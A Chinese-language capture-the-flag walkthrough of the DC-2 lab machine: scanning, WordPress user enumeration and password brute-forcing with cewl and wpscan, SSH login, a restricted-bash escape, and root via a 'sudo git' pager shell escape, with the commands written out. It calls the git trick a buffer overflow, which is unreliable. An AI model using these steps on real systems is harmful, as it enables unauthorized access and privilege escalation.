一、信息收集

1、主机探测

arp-scan -l
探测同网段

2、端口扫描

nmap -sS -sV 192.168.66.136

80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

这里是扫描出来两个端口，80和ssh，先扫一下目录然后访问80端口

3、目录扫描

二、外网打点

Flag1

这是我们扫描出来的目录，访问去看看

如果访问重定向报错记得在/etc/hosts中添加ip即可，在windows中的C:/Windows/System32/drivers/etc/HOSTS中添加ip dc-2即可成功

[15:46:20] 200 -   18KB - /index.php                                        
[15:46:21] 200 -    7KB - /license.txt                                      
[15:46:28] 200 -    3KB - /readme.html                                      
[15:46:36] 200 -    0B  - /wp-content/                                      
[15:46:37] 200 -   84B  - /wp-content/plugins/akismet/akismet.php           
[15:46:37] 200 -    0B  - /wp-config.php
[15:46:37] 200 -    1B  - /wp-admin/admin-ajax.php                          
[15:46:37] 200 -  528B  - /wp-admin/install.php                             
[15:46:37] 200 -    4KB - /wp-includes/                                     
[15:46:37] 200 -    1KB - /wp-login.php                                     
[15:46:37] 200 -    0B  - /wp-cron.php   

在该目录下找到了Flag1，接着找下一个

Flag2

这里我们使用cewl爬了一个字典，估计是拿这个字典去爆登录页面

指纹扫出来时wp，使用wpsacn爆一下

结果爆出来了，admin、jerry、tom三个账户，我们把它放进一个txt中当作字典去爆

这里扫描除了账户对应密码，我们去看看

我们在jerry/adipiscing这组账户密码中得到了Flag2

到这里就要换方向了，我们去看ssh

Flag3

这里我们找到了flag3

不过这里我们遇到了-rbash，这个含义就是说我们的bash是不完整的，很多命令无法执行，无法操作，我们需要绕过

把/bin/bash给a变量,绕过首先的shellBASH_CMDS[a]=/bin/sh;a#使用并添加环境变量，将/bin 作为PATH环境变量导出export PATH=$PATH:/bin/ #将/usr/bin作为PATH环境变量导出export PATH=$PATH:/usr/bin

flag4

这里我们使用su jerry就能进入到jerry用户，这里tom写的环境变量需要等一等才能生效，在我这里如果执行了环境变量直接到jerry用户会报错。然后我们进入到jerry目录就能发现了flag4

Flag5

这里作者给了提示git提权 git提权的原理是git存在缓冲区溢出漏洞，在使用sudo git -p help时，不需要输入root密码既可以执行这条命令。以下有两种方法：

1、sudo git help config,然后在末行输入!/bin/bash或!'sh'完成提权。 2、sudo git -p help，然后输入!/bin/bash,即可打开一个root的shell。 不得不说这个靶场很经典，每个git提权都是以这台靶机作为实例

提权成功

最后在root目录下找到了最后一个flag

完结！！！